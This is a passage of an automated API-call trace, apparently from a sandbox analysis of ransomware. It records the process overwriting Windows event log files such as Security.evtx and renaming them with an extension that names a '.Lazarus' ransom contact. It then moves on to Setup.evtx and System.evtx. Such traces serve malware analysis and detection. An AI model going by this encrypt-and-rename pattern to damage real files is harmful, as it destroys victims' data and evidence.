RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df88 [0073.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x90450 [0073.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0073.104] GetLastError () returned 0x0 [0073.104] SetLastError (dwErrCode=0x0) [0073.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0073.104] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0073.104] WriteFile (in: hFile=0x428, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0073.105] WriteFile (in: hFile=0x428, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0073.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0073.105] CloseHandle (hObject=0x428) returned 1 [0073.319] AreFileApisANSI () returned 1 [0073.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0073.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0073.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x4e298, cchWideChar=22 | out: lpWideCharStr="C:\\Logs\\Security.evtx") returned 22 [0073.319] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.319] GetFileType (hFile=0x428) returned 0x1 [0073.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0073.319] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0073.319] ReadFile (in: hFile=0x428, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0073.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0073.321] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0073.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0073.321] GetLastError () returned 0x0 [0073.321] SetLastError (dwErrCode=0x0) [0073.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0073.321] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0073.321] WriteFile (in: hFile=0x428, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0073.322] WriteFile (in: hFile=0x428, lpBuffer=0x88b38*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0073.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0073.322] CloseHandle (hObject=0x428) returned 1 [0073.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0073.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0073.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0073.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69db0 [0073.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0073.344] AreFileApisANSI () returned 1 [0073.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0073.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dff8 [0073.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x4dff8, cchWideChar=22 | out: lpWideCharStr="C:\\Logs\\Security.evtx") returned 22 [0073.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x69db0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0073.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x60348 [0073.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x69db0, cbMultiByte=-1, lpWideCharStr=0x60348, cchWideChar=84 | out: lpWideCharStr="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 84 [0073.344] MoveFileExW (lpExistingFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), lpNewFileName="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\security.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0073.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.345] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xf9584475, dwReserved1=0x97df6623, cFileName="Setup.evtx", cAlternateFileName="SETUP~1.EVT")) returned 1 [0073.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0073.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0073.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0073.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0073.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0073.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0073.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.346] AreFileApisANSI () returned 1 [0073.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Setup.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Setup.evtx", lpUsedDefaultChar=0x0) returned 19 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0073.346] AreFileApisANSI () returned 1 [0073.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0073.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a908 [0073.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a908, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0073.346] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.347] GetFileType (hFile=0x428) returned 0x1 [0073.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a908 | out: hHeap=0x20000) returned 1 [0073.347] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0073.347] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0073.347] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0073.347] CloseHandle (hObject=0x428) returned 1 [0073.347] AreFileApisANSI () returned 1 [0073.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0073.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a6f8 [0073.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a6f8, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0073.348] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.348] GetFileType (hFile=0x428) returned 0x1 [0073.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a6f8 | out: hHeap=0x20000) returned 1 [0073.348] CloseHandle (hObject=0x428) returned 1 [0073.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0073.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0073.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0073.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0073.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0073.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0073.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.349] AreFileApisANSI () returned 1 [0073.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0073.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a9c8 [0073.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a9c8, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0073.349] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a9c8 | out: hHeap=0x20000) returned 1 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.349] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="System.evtx", cAlternateFileName="SYSTEM~1.EVT")) returned 1 [0073.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0073.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0073.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0073.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.350] AreFileApisANSI () returned 1 [0073.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\System.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\System.evtx", lpUsedDefaultChar=0x0) returned 20 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.350] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0073.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0073.351] AreFileApisANSI () returned 1 [0073.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0073.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7ac38 [0073.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=20 | out: lpWideCharStr="C:\\Logs\\System.evtx") returned 20 [0073.351] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.498] GetFileType (hFile=0x410) returned 0x1 [0073.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0073.498] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0073.499] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0073.499] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0073.499] CloseHandle (hObject=0x410) returned 1 [0073.499] AreFileApisANSI () returned 1 [0073.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0073.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7ab78 [0073.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, 